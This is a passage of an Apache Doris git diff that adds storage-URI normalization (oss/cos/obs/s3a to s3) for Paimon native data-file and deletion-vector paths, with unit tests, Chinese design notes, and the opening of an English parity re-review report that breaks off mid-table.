RawFile file = parquetRawFile("oss://bkt/warehouse/db/t/part-0.parquet"); + DeletionFile dv = new DeletionFile( + "oss://bkt/warehouse/db/t/index/dv-0.index", 8L, 16L, 4L); + + PaimonScanRange range = provider.buildNativeRange( + file, dv, "parquet", Collections.emptyMap()); + + // WHY: BE's scheme-dispatched S3 file factory only opens canonical s3://. An un-normalized + // oss:// DATA-file path fails the native ORC/Parquet read outright; an un-normalized oss:// DV + // path silently drops the deletion vector so DELETEd rows reappear (merge-on-read corruption). + // BOTH must route through ConnectorContext.normalizeStorageUri (legacy PaimonScanNode normalizes + // both via the 2-arg LocationPath.of). MUTATION: dropping normalizeUri on either site -> that + // path stays oss:// -> red. + Assertions.assertEquals("s3://bkt/warehouse/db/t/part-0.parquet", + range.getPath().orElse(null), "data-file path must be normalized to s3://"); + Assertions.assertEquals("s3://bkt/warehouse/db/t/index/dv-0.index", + range.getProperties().get("paimon.deletion_file.path"), + "deletion-vector path must be normalized to s3://"); + Assertions.assertEquals(2, ctx.normalizeCount, + "both the data-file and the DV path must be routed through normalizeStorageUri"); + } + + @Test + public void nativeRangeWithoutDeletionVectorNormalizesOnlyDataPath() { + RecordingConnectorContext ctx = new RecordingConnectorContext(); + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + new HashMap<>(), new RecordingPaimonCatalogOps(), ctx); + + PaimonScanRange range = provider.buildNativeRange( + parquetRawFile("oss://bkt/a/part-0.parquet"), null, "parquet", Collections.emptyMap()); + + // WHY: a DV-less native split must still normalize its data-file path and must NOT emit a DV + // descriptor. MUTATION: emitting a deletion_file for a null DV, or skipping data normalization -> red. + Assertions.assertEquals("s3://bkt/a/part-0.parquet", range.getPath().orElse(null)); + Assertions.assertFalse(range.getProperties().containsKey("paimon.deletion_file.path"), + "no deletion vector -> no deletion_file descriptor"); + Assertions.assertEquals(1, ctx.normalizeCount); + } + + @Test + public void nativeRangeWithoutContextPreservesRawPath() { + // 3-arg ctor leaves context == null (the offline harness path): no normalization machinery is + // available, so the raw path is preserved without NPE. The real oss://->s3:// rewrite is + // covered by DefaultConnectorContextNormalizeUriTest (fe-core). + PaimonScanPlanProvider provider = new PaimonScanPlanProvider( + new HashMap<>(), new RecordingPaimonCatalogOps()); + + PaimonScanRange range = provider.buildNativeRange( + parquetRawFile("oss://bkt/a/part-0.parquet"), null, "parquet", Collections.emptyMap()); + + // MUTATION: NPE on null context, or fabricating a normalized path from nothing -> red. + Assertions.assertEquals("oss://bkt/a/part-0.parquet", range.getPath().orElse(null)); + } + @Test public void resolveScanTableAppliesSnapshotPinViaCopy() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java index 1032a12436b755..7952f99c834a14 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java @@ -46,11 +46,27 @@ final class RecordingConnectorContext implements ConnectorContext { /** The {@code resources} string the connector passed to {@link #loadHiveConfResources}. */ String lastHiveConfResourcesArg; + // ---- FIX-URI-NORMALIZE: normalizeStorageUri hook ---- + /** Number of times the connector invoked {@link #normalizeStorageUri}. */ + int normalizeCount; + @Override public String getCatalogName() { return "test"; } + @Override + public String normalizeStorageUri(String rawUri) { + normalizeCount++; + // Deterministic stand-in for the engine's oss://->s3:// scheme rewrite, so a connector wiring + // test can prove BOTH the data-file and DV paths were routed through this hook (the real + // normalization is covered by DefaultConnectorContextNormalizeUriTest in fe-core). + if (rawUri != null && rawUri.startsWith("oss://")) { + return "s3://" + rawUri.substring("oss://".length()); + } + return rawUri; + } + @Override public Map loadHiveConfResources(String resources) { hiveConfResourcesCalled = true; diff --git a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java index 6deed71f9579a0..2442c8bf6729c2 100644 --- a/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java +++ b/fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java @@ -139,4 +139,27 @@ default Map loadHiveConfResources(String resources) { default Map vendStorageCredentials(Map rawVendedCredentials) { return Collections.emptyMap(); } + + /** + * Normalizes a raw storage URI a connector emits (e.g. a paimon native data-file or + * deletion-vector path such as {@code oss://…}, {@code cos://…}, {@code obs://…}, {@code s3a://…}, + * or the OSS {@code bucket.endpoint} authority form) into BE's canonical, scheme-dispatched form + * ({@code s3://…}) using the catalog's storage properties. BE's file factory only recognizes the + * canonical scheme, so a connector that hands native file paths to BE MUST route them through this + * hook; otherwise the native read fails (data file) or silently returns wrong rows (deletion + * vector / merge-on-read). The connector cannot perform this itself (it must not import fe-core's + * {@code LocationPath} / {@code StorageProperties}); the engine applies the same normalization it + * uses for static catalog paths. + * + *

      The default returns the input unchanged (no normalization machinery), so every other + * connector — and any URI already in canonical form — is unaffected. + * + * @param rawUri the raw storage URI (null/blank is returned unchanged) + * @return the normalized BE-facing URI + * @throws RuntimeException if normalization fails (fail-loud, legacy parity — a wrong path would + * otherwise silently corrupt reads rather than surface the misconfiguration) + */ + default String normalizeStorageUri(String rawUri) { + return rawUri; + } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java index 69fb4be776aee1..5edee43c73c6d6 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java +++ b/fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java @@ -22,6 +22,7 @@ import org.apache.doris.common.Config; import org.apache.doris.common.EnvUtils; import org.apache.doris.common.security.authentication.ExecutionAuthenticator; +import org.apache.doris.common.util.LocationPath; import org.apache.doris.connector.api.ConnectorHttpSecurityHook; import org.apache.doris.connector.spi.ConnectorContext; import org.apache.doris.connector.spi.ConnectorMetaInvalidator; @@ -59,6 +60,10 @@ public class DefaultConnectorContext implements ConnectorContext { private final long catalogId; private final Map environment; private final Supplier authSupplier; + // Lazily supplies the catalog's static storage-properties map for storage-URI normalization + // (FIX-URI-NORMALIZE). Invoked at scan time only (catalog fully initialized). Empty for ctors + // that do not wire it — those callers (non-plugin catalogs) never invoke normalizeStorageUri. + private final Supplier> storagePropertiesSupplier; private final ConnectorHttpSecurityHook httpSecurityHook = new ConnectorHttpSecurityHook() { @Override @@ -78,9 +83,17 @@ public DefaultConnectorContext(String catalogName, long catalogId) { public DefaultConnectorContext(String catalogName, long catalogId, Supplier authSupplier) { + this(catalogName, catalogId, authSupplier, Collections::emptyMap); + } + + public DefaultConnectorContext(String catalogName, long catalogId, + Supplier authSupplier, + Supplier> storagePropertiesSupplier) { this.catalogName = Objects.requireNonNull(catalogName, "catalogName"); this.catalogId = catalogId; this.authSupplier = Objects.requireNonNull(authSupplier, "authSupplier"); + this.storagePropertiesSupplier = + Objects.requireNonNull(storagePropertiesSupplier, "storagePropertiesSupplier"); this.environment = buildEnvironment(); } @@ -165,6 +178,20 @@ public Map vendStorageCredentials(Map rawVendedC } } + @Override + public String normalizeStorageUri(String rawUri) { + if (Strings.isNullOrEmpty(rawUri)) { + return rawUri; + } + // Mirror legacy PaimonScanNode's 2-arg LocationPath.of(path, storagePropertiesMap): + // scheme-normalize (oss/cos/obs/s3a -> s3, OSS bucket.endpoint -> bucket) via the catalog's + // static storage properties so BE's scheme-dispatched S3 factory can open the file. Fail-loud + // (StoragePropertiesException propagates) — a path that cannot be normalized would otherwise + // silently corrupt reads (esp. a deletion-vector path on merge-on-read). Single source of + // truth: the SAME LocationPath normalization legacy/iceberg/hive use, so no drift. + return LocationPath.of(rawUri, storagePropertiesSupplier.get()).toStorageLocation().toString(); + } + private static Map buildEnvironment() { Map env = new HashMap<>(); String dorisHome = EnvUtils.getDorisHome(); diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java index cee0a98aebea68..f52254711ce752 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java @@ -147,7 +147,8 @@ protected Connector createConnectorFromProperties() { String catalogType = getType(); return ConnectorFactory.createConnector(catalogType, catalogProperty.getProperties(), - new DefaultConnectorContext(name, id, this::getExecutionAuthenticator)); + new DefaultConnectorContext(name, id, this::getExecutionAuthenticator, + () -> catalogProperty.getStoragePropertiesMap())); } @Override diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextNormalizeUriTest.java b/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextNormalizeUriTest.java new file mode 100644 index 00000000000000..5d5997ef894777 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/DefaultConnectorContextNormalizeUriTest.java @@ -0,0 +1,99 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector; + +import org.apache.doris.common.security.authentication.ExecutionAuthenticator; +import org.apache.doris.datasource.property.storage.StorageProperties; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.function.Function; +import java.util.function.Supplier; +import java.util.stream.Collectors; + +/** + * FIX-URI-NORMALIZE fe-core bridge test: pins that + * {@link DefaultConnectorContext#normalizeStorageUri} rewrites a connector-supplied storage URI to + * BE's canonical {@code s3://} scheme using the catalog's storage properties (the same + * {@code LocationPath} normalization legacy {@code PaimonScanNode} applies via the 2-arg + * {@code LocationPath.of(path, storagePropertiesMap)}). The paimon connector cannot import that + * machinery, so this hook is its only access; without it a native ORC/Parquet read on an + * OSS/COS/OBS warehouse reaches BE with an un-openable {@code oss://} path (data file fails, or a + * deletion vector is silently dropped). FAILS before the fix (the method is a no-op default + * returning the raw URI). + */ +public class DefaultConnectorContextNormalizeUriTest { + + private static final Supplier NOOP_AUTH = + () -> new ExecutionAuthenticator() {}; + + /** A context whose storage-props supplier yields a real OSS storage-properties map, built with + * the same {@code StorageProperties.createAll} machinery a real OSS catalog uses. */ + private static DefaultConnectorContext ossContext() throws Exception { + Map oss = new HashMap<>(); + oss.put("oss.endpoint", "oss-cn-beijing.aliyuncs.com"); + oss.put("oss.access_key", "ak"); + oss.put("oss.secret_key", "sk"); + List all = StorageProperties.createAll(oss); + Map map = all.stream() + .collect(Collectors.toMap(StorageProperties::getType, Function.identity(), (a, b) -> a)); + return new DefaultConnectorContext("c", 1L, NOOP_AUTH, () -> map); + } + + @Test + public void normalizesOssSchemeToS3() throws Exception { + // WHY: BE's scheme-dispatched S3 file factory only recognizes s3://; legacy LocationPath.of + // rewrites oss:// (and cos/obs/s3a) -> s3://. This hook is the connector's ONLY access to that + // normalization (it must not import LocationPath). MUTATION: returning the raw oss:// path + // (the no-op SPI default) -> red. + Assertions.assertEquals("s3://bkt/warehouse/db/t/part-0.parquet", + ossContext().normalizeStorageUri("oss://bkt/warehouse/db/t/part-0.parquet")); + } + + @Test + public void s3SchemeIsUnchanged() throws Exception { + // WHY: an already-canonical s3:// path must pass through unchanged (idempotent fast path). + // MUTATION: mangling the s3:// path -> red. + Assertions.assertEquals("s3://bkt/warehouse/f.parquet", + ossContext().normalizeStorageUri("s3://bkt/warehouse/f.parquet")); + } + + @Test + public void nullOrBlankIsReturnedUnchanged() throws Exception { + // WHY: defensive short-circuit before touching the storage-props supplier -> no NPE on a + // null/blank path. MUTATION: NPE, or fabricating output from nothing -> red. + Assertions.assertNull(ossContext().normalizeStorageUri(null)); + Assertions.assertEquals("", ossContext().normalizeStorageUri("")); + } + + @Test + public void failsLoudWhenNoStoragePropertiesForScheme() { + // WHY: a context with no storage-properties map must FAIL LOUD on a real path rather than + // silently shipping the raw oss:// to BE (which would corrupt reads). Mirrors legacy + // LocationPath.of(path, {}) throwing StoragePropertiesException. The ctors that do not wire a + // storage map are never used by paimon, but the fail-loud contract is pinned here. + // MUTATION: swallowing the error and returning the raw path -> red. + DefaultConnectorContext noStorage = new DefaultConnectorContext("c", 1L); + Assertions.assertThrows(RuntimeException.class, + () -> noStorage.normalizeStorageUri("oss://bkt/a/part-0.parquet")); + } +} diff --git a/plan-doc/01-spi-extensions-rfc.md b/plan-doc/01-spi-extensions-rfc.md index a427e495e74aee..dd00eea767c4ae 100644 --- a/plan-doc/01-spi-extensions-rfc.md +++ b/plan-doc/01-spi-extensions-rfc.md @@ -1268,3 +1268,24 @@ fi **三处 seam**:B1 commit 载荷 opaque bytes(`TBinaryProtocol` 序列化,单点 `CommitDataSerializer`,连接器反序列化);C1 maxcompute block-id 窄 callback;E 写-plan-provider 产 opaque `TDataSink`。 **W-phase 落地**(behind gate、零行为变更、golden 等价):W1+W2(SPI 面 + `Transaction` 泛化)`be945476ba7`;W3+W6(解耦 3 热路径 + golden 测)`9ad2bbe40ec`;W4(`PluginDrivenTransaction` 委派)`759cc0874c8`;W5(`planWrite` layer 进 `visitPhysicalConnectorTableSink`,见 [DV-009])`9ebe5e27fa4`;W7(本节 + [D-021]/[D-022])。逐连接器 adopter(搬类 + impl 写 SPI + 翻闸)= P4 / P6 / P7。 + +--- + +## 21. 扩展 E13:存储 URI 归一化(`ConnectorContext.normalizeStorageUri`) + +> 后补节(2026-06-11,P5-fix-FIX-URI-NORMALIZE)。findings B-7DF(native 数据文件)+ B-7DV(deletion vector)—— 见 [task-list #1](./task-list-P5-rereview2-fixes.md) / [设计](./tasks/designs/P5-fix-URI-NORMALIZE-design.md)。 + +**问题**:paimon 连接器把 native ORC/Parquet **数据文件路径**和 **deletion-vector 路径**裸传 BE,未做 scheme 归一化。paimon SDK 发的是 warehouse 原生 scheme(`oss://`/`cos://`/`obs://`/`s3a://`,或 OSS `bucket.endpoint` authority 形);BE 文件工厂按 scheme 分派、S3 reader 只认 `s3://`。后果:S3-兼容(非 AWS)warehouse 上 native 数据文件读直接挂(B-7DF),或 DV 静默丢→被删行重现(B-7DV,merge-on-read 错行,更危险)。纯 `s3://`/`hdfs://` 不受影响;JNI 路不受影响(序列化 paimon `Table` 自带 `FileIO`)。 + +**根因**:legacy `PaimonScanNode` 两路径都经 **2-arg 归一化** `LocationPath.of(path, storagePropertiesMap)` → `StorageProperties.validateAndNormalizeUri()`(`PaimonScanNode.java:443` 数据文件 / `:296-297` DV);翻闸丢了。连接器禁 import fe-core `LocationPath`/`StorageProperties`,故须经 SPI 缝。两路径机制不同:数据文件经 `PluginDrivenSplit.buildPath` 的**单-arg 非归一化** `LocationPath.of(pathStr)` → `FileQueryScanNode:568` 写 thrift;DV 由连接器在 `PaimonScanRange.populateRangeParams` **直接烤进 thrift**,fe-core 永不经手 → bridge-only 修不到 DV。故唯一统一缝 = 连接器侧 SPI 调用。 + +**SPI 面(default no-op,零它连接器影响)**: +- `ConnectorContext.normalizeStorageUri(String rawUri) → String`(`fe-connector-spi`):default 返回原值(恒等),故 es/jdbc/maxcompute/trino 及任何已规范 URI 不受影响。 +- fe-core `DefaultConnectorContext` override:`LocationPath.of(rawUri, storagePropertiesSupplier.get()).toStorageLocation().toString()`——复用引擎/legacy/iceberg 同一 `LocationPath` 归一化,单一真相源、无漂移。**fail-loud**(`StoragePropertiesException` 传播):路径归一化不了宁可显式炸,不可静默送裸路(DV 错行)。null/blank 短路返回原值。 +- `DefaultConnectorContext` 加 `Supplier> storagePropertiesSupplier`(4-arg ctor;既有 2/3-arg ctor 委派空 map supplier——它们不被 paimon 用、该法仅 paimon 调)。`PluginDrivenExternalCatalog:150` 接线 `() -> catalogProperty.getStoragePropertiesMap()`(lazy,scan 时调,catalog 已初始化)。 + +**连接器侧**:`PaimonScanPlanProvider.buildNativeRange`(B7 抽出的可测 seam)对**数据文件路径 + DV 路径**各调 `normalizeUri()`(= `context != null ? context.normalizeStorageUri(raw) : raw`,null-guard 同 `vendStorageCredentials`,offline 单测保留裸路)。JNI 路 + `getScanNodeProperties` 不动。 + +**作用域/偏差**:归一化用 catalog **静态** `getStoragePropertiesMap()`,非 legacy 的 vended-overlay 版(`VendedCredentialsFactory`)——scheme 归一化与 vended 凭据正交(vended 改 `AWS_*` 键非 scheme),仅 *纯-vended-无静态存储配* REST catalog 的边角会缺 entry→fail-loud;该边角归凭据缝(#2 `FIX-STATIC-CREDS-BE` / `FIX-REST-VENDED`),见 [DV-025](./deviations-log.md)。 + +**测**:fe-core `DefaultConnectorContextNormalizeUriTest`(真 OSS map,oss://→s3://、s3:// 恒等、null/blank、空 map fail-loud);连接器 `PaimonScanPlanProviderTest` 3 测(`buildNativeRange` 数据文件+DV 双归一化、无-DV 仅数据、无-context 裸路)。live-e2e(OSS warehouse + DV)CI-gated。 diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index d2d5e20a4327ec..6ee5344c8b03ad 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -13,10 +13,11 @@ ## 📋 索引 -> 时间倒序;当前共 **24** 项。 +> 时间倒序;当前共 **25** 项。 | 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | |---|---|---|---|---| +| DV-025 | P5-fix-FIX-URI-NORMALIZE:`normalizeStorageUri` 用 catalog **静态** `getStoragePropertiesMap()` 做 scheme 归一化,**非** legacy `PaimonScanNode:171` 的 vended-overlay 版(`VendedCredentialsFactory.getStoragePropertiesMapWithVendedCredentials`)。理由:scheme 归一化(oss/cos/obs/s3a→s3、bucket.endpoint→bucket)与 vended 凭据正交——vended 只改 `AWS_*` 键、不改 scheme/bucket 形;只要 warehouse endpoint 静态配置(OSS/COS/OBS 绝大多数情形必配,否则连不上)静态 map 即含该 type entry,归一化与 legacy 等价。唯一分歧 = *纯-vended、无静态存储配* 的 REST catalog:静态 map 可能缺 entry → `LocationPath.of` fail-loud 抛(legacy vended-overlay 版不抛)。该边角**与凭据缝重叠、本 fix 显式不收**,归 task-list #2 `FIX-STATIC-CREDS-BE` / `FIX-REST-VENDED`(review §9.3 三道凭据缝之一)。fail-loud 优于静默送裸 `oss://`(后者 DV 错行)| [task-list #1](./task-list-P5-rereview2-fixes.md) / [P5-fix-URI-NORMALIZE 设计](./tasks/designs/P5-fix-URI-NORMALIZE-design.md) / [SPI RFC §21](./01-spi-extensions-rfc.md) | 2026-06-11 | 🟢 已登记(scope 决策,凭据边角归 #2/#3)| | DV-024 | P5-B4 揭出并修复 B2 遗留缺陷(普通 paimon plugin 表 BE 描述符错型):`PaimonConnectorMetadata` 不 override `buildTableDescriptor`(SPI default 返 null)→ `PluginDrivenExternalTable.toThrift` 走 fallback `SCHEMA_TABLE`(BE `descriptors.cpp:635` 建 `SchemaTableDescriptor`),而 legacy `PaimonExternalTable.toThrift` + sys 表须 `HIVE_TABLE`(`:644` `HiveTableDescriptor`)。B4/T19 加 `buildTableDescriptor` override(`HIVE_TABLE`+`THiveTable`,镜像 legacy + MC `MaxComputeConnectorMetadata.buildTableDescriptor`),**一处修同时正普通表+sys 表**。inert until 翻闸(paimon 未入 `SPI_READY_TYPES`),真值闸=live-e2e BE 描述符 | [tasks/P5 T19](./tasks/P5-paimon-migration.md) / [D-039](./decisions-log.md) | 2026-06-10 | 🟢 已修正(T19,live-e2e 待验)| | DV-023 | RFC §10(E7 Sys Tables)设计被 P5-B4 取代:RFC §10 的「sys-table = `$`-后缀普通表 + 连接器 `getTableHandle` 内解析后缀 + `listSysTableSuffixes`」**从未实现**;live fe-core 实为 `SysTableResolver`+`NativeSysTable`+`TableIf.getSupportedSysTables/findSysTable`(iceberg + legacy-paimon 共用)。B4 按 [D-039](./decisions-log.md) 复用该 live 机制(连接器 `listSupportedSysTables`+`getSysTableHandle`,fe-core 通用 `PluginDrivenSysExternalTable`),RFC §10 加脚注标 superseded | [01-spi-extensions-rfc.md §10](./01-spi-extensions-rfc.md) / [D-039](./decisions-log.md) | 2026-06-10 | 🟢 已修正(RFC §10 脚注 + D-039)| | DV-022 | P4-T09 §8:fe-common 去 odps 暴露隐藏传递依赖(依赖卫生,非缺陷)——`odps-sdk-core` 此前**传递**为 fe-common 自身 `DorisHttpException`(io.netty) / `GsonUtilsBase`(com.google.protobuf) 提供 jar;删 odps-sdk-core 后编译暴露缺失,故 fe-common/pom 显式补 `netty-all`+`protobuf-java`(parent dependencyManagement 管版本)。设计 §8 原假设「odps 仅服务 MCUtils」不全 | [Batch-D 设计 §8](./tasks/designs/P4-batchD-maxcompute-removal-design.md) / [D-027] | 2026-06-09 | 🟢 已修正(显式声明,`409300a75b8`)| diff --git a/plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md b/plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md new file mode 100644 index 00000000000000..60ea0cecd97e54 --- /dev/null +++ b/plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md @@ -0,0 +1,557 @@ +# P5 Paimon Connector — Clean-Room 2nd-Round Parity Re-Review (2026-06-11) + +## 1. Scope + +This is a **clean-room, 2nd-round parity audit** of the Apache Doris paimon connector +migration, performed at **HEAD `98a73bf7692`** ("[P5-B7+fixes] paimon B7 cutover + 8 +fullpath-review fixes"). The **baseline is the legacy `datasource/paimon/*` source set, +which is still in the tree** (dead-but-in-tree after the B7 cutover) and is used verbatim +as the parity target. The cutover is **live**: `paimon` is a member of +`CatalogFactory.SPI_READY_TYPES` (`fe/fe-core/.../datasource/CatalogFactory.java:51`), so a +paimon catalog is constructed as `PluginDrivenExternalCatalog` and routes scans through +`PluginDrivenScanNode` + the connector `PaimonScanPlanProvider`, not the legacy +`PaimonScanNode`. The legacy classes are never reached on the connector path. + +The audit ran **13 path reviews** plus a **completeness critic**. Every BLOCKER/MAJOR +finding was put through a **3-lens adversarial verification** (new-code-correctness, +legacy-parity, reproducibility). A finding is **CONFIRMED** when upheld by **>= 2 of the 3 +lenses**. MINOR/NIT findings were recorded but not subjected to the full 3-lens gate. + +This report is faithful to the structured audit data: severities are not invented, and +refuted findings are not upgraded. + +--- + +## 2. Verdict Summary + +| Bucket | Count | +| --- | --- | +| **CONFIRMED BLOCKER** | **4** (distinct defects; 6 BLOCKER finding-instances across paths, deduped below) | +| **CONFIRMED MAJOR** | **6** (distinct defects; 7 MAJOR finding-instances across paths, deduped below) | +| **Findings RAISED but REFUTED** by adversarial verification | **1** (the standalone "field-id loss" MAJOR repro lens, path #10) | +| **MINOR / NIT** | **~18** (compact list in §5) | + +### Deduplicated CONFIRMED BLOCKER families (4 distinct root causes) + +1. **Native-reader URI scheme normalization lost** — data-file path **and** deletion-vector + path sent to BE un-normalized (oss://, cos://, obs://, s3a:// not rewritten to s3://). + Surfaced as BLOCKERs in paths #7 (DV path), #7 (data-file path), #9 (static credentials + sibling on same native path), and the critic (additional_finding). One root cause, broad + blast radius on S3-compatible warehouses. +2. **Native-reader schema-evolution lost** — connector never emits + `current_schema_id` / `history_schema_info`, so BE degrades to NAME-based file<->table + column matching → silent wrong/NULL rows on column rename/reorder. Surfaced as BLOCKERs in + paths #1, #10 (params-level), #13, and the critic. +3. **Static S3/OSS/COS/OBS credentials reach BE as RAW keys** (`s3.access_key`, not + `AWS_ACCESS_KEY`) → native reader on a private object-store bucket gets no usable + credentials. Path #9. +4. **JDBC flavor** — two BLOCKERs: (a) sends BE the **raw, unresolved `jdbc.driver_url`** + and drops the `paimon.jdbc.*` alias → `MalformedURLException`; (b) **JDBC `driver_url` + security allow-list / format validation / secure-path not enforced** → arbitrary remote + jar loaded into the FE JVM. Path #8. + +### Deduplicated CONFIRMED MAJOR families (6 distinct root causes) + +1. **`force_jni_scanner` session variable silently ignored** — the JNI escape hatch is gone; + native always chosen for ORC/Parquet regardless of the flag. Paths #1 and #13. +2. **COUNT(\*) pushdown (FE-computed `mergedRowCount`) not implemented** — BE materializes + merged rows to count; correctness preserved by frozen BE `-1` fallback. Path #1. +3. **Native ORC/Parquet sub-file splitting (parallelism) lost** — one split per RawFile. + Path #1. +4. **filesystem/jdbc over Kerberized HDFS lose UGI `doAs`** — HDFS authenticator never wired + (`initializeCatalog` is dead on the cutover path). Path #8. +5. **MTMV / SHOW PARTITIONS / partitions-TVF partition listing loses the Kerberos + authenticator** (UGI `doAs`) that legacy applied. Path #11. +6. **Read-schema type-mapping flags silently disabled** — connector reads underscore keys + (`enable_mapping_binary_as_varbinary` / `enable_mapping_timestamp_tz`) while FE/legacy + set DOTTED keys (`enable.mapping.varbinary` / `enable.mapping.timestamp_tz`) → BINARY and + TIMESTAMP_TZ columns map to the WRONG Doris type for any user who enabled the flags. + Surfaced by the completeness critic (additional_finding); not caught by the 13 paths. + *(This is a critic-surfaced MAJOR; it was not run through the 3-lens gate but is + evidence-anchored end-to-end.)* + +Also confirmed MAJOR (read direction, path #10): **read schema loses the paimon field-id +(`Column.uniqueId`) for every column including nested complex types** — confirmed by 2 of 3 +lenses (the reproducibility lens of the *standalone* `Column.getUniqueId()` repro was +refuted; see §4). The underlying BE-contract consequence is the same machinery as BLOCKER #2. + +### Commit-ready? **NO** + +The branch is **not commit-ready**. There are 4 distinct CONFIRMED BLOCKER families, each +reachable on a normal query against a realistically configured paimon catalog post-cutover. + +**Gating items (must be resolved before commit):** + +- **B1 — Native URI scheme normalization** (data-file + deletion-file paths). Restore the + legacy `validateAndNormalizeUri` (oss/cos/obs/s3a → s3) on the connector native path or via + an SPI path-normalization seam. Breaks all native ORC/Parquet + DV reads on + OSS/COS/OBS/s3a warehouses. +- **B2 — Native schema-evolution** (`current_schema_id` / `history_schema_info`). Restore + field-id-based file<->table column mapping; otherwise schema-evolved (renamed) tables read + wrong/NULL rows silently on the default native path. +- **B3 — Static object-store credentials** delivered as RAW keys. Normalize to canonical + `AWS_*` keys (or vend through the same normalization tail as REST). Breaks native reads on + any private S3/OSS/COS/OBS bucket created with the documented `s3.*`/`oss.*` properties. +- **B4 — JDBC flavor**: resolve `jdbc.driver_url` via `getFullDriverUrl` on the BE-options + path, honor the `paimon.jdbc.*` alias, AND enforce the FE security allow-list / format / + secure-path validation. Otherwise a JDBC catalog fails (`MalformedURLException`) and/or + loads an arbitrary remote jar into the FE JVM. + +The 6 MAJOR families should be addressed or explicitly accepted (with the Kerberos-`doAs` +losses on filesystem/jdbc and MTMV partition listing being the most behavior-affecting on +secured deployments, and the dotted-vs-underscore mapping-flag bug being a real wrong-type +regression). + +--- + +## 3. CONFIRMED BLOCKER + MAJOR Findings Table + +Verdict legend: `C` = new-code-correctness, `P` = legacy-parity, `R` = reproducibility; +`upheld` / `refuted`. "Confirmed" = upheld by >= 2 lenses. + +### CONFIRMED BLOCKERs + +| ID | Sev | Title | Connector file:line | Legacy file:line | Behavior diff | Repro | 3-lens verdict (upheld/3) | +| --- | --- | --- | --- | --- | --- | --- | --- | +| B-1a | BLOCKER | Native read loses paimon schema-evolution (`history_schema_info` / `current_schema_id`) → silently wrong rows on schema-evolved tables | `PaimonScanPlanProvider.java:276` (only `.schemaId(file.schemaId())`); `PaimonScanRange.java:181-184`; `PluginDrivenScanNode.java:519-572,782-799` (never calls `ExternalUtil.initSchemaInfo`) | `paimon/source/PaimonScanNode.java:169,285,236-251`; `ExternalUtil.java:86-92` | Legacy sets `current_schema_id=-1` + pushes current(-1) and per-file historical `TSchema` into `history_schema_info`; BE (`table_schema_change_helper.h:241-268`) matches BY FIELD ID. Connector emits only per-file `schema_id`, never the params, so BE takes the `!isset` branch (`:219-235`) → NAME-based matching → renamed columns in older-schema files read NULL/garbage. JNI path unaffected; native is the default. | `test_paimon_full_schema_change.groovy` (struct field a→new_a) over ORC/Parquet; `SELECT new_a` returns NULL for pre-rename rows | C=upheld, P=upheld, R=upheld (**3/3, confirmed**) | +| B-7DV | BLOCKER | Native deletion-vector path sent to BE un-normalized (oss/cos/s3a not rewritten to s3) → MOR read fails / corruption on S3-compatible Paimon tables | `PaimonScanPlanProvider.java:281-283` (`builder.deletionFile(df.path(),...)` raw); `PaimonScanRange.java:190-200` (`deletionFile.setPath` verbatim) | `paimon/source/PaimonScanNode.java:295-298` (`LocationPath.of(deletionFile.path(), storagePropertiesMap).toStorageLocation()`) | Legacy normalizes DV uri via `validateAndNormalizeUri` (oss→s3); connector passes raw paimon path. BE `paimon_reader.cpp:96` opens `delete_range.path` verbatim via scheme-dispatched factory → only `s3://` recognized → DV open fails or deleted rows reappear. No `ConnectorContext` path-normalization seam exists. | OSS/COS/OBS warehouse, `deletion-vectors.enabled=true`; DELETE then SELECT → native split carries `oss://...index/...`; BE can't open DV → deleted rows reappear | C=upheld, P=upheld, R=upheld (**3/3, confirmed**) | +| B-7DF | BLOCKER | Native **data-file** path also sent to BE un-normalized (same root cause) → native ORC/Parquet read fails on S3-compatible tables, which gates the DV merge | `PaimonScanPlanProvider.java:269-276` (`.path(file.path())`); `PluginDrivenSplit.java:65-68` (single-arg, NON-normalizing `LocationPath.of`); consumed 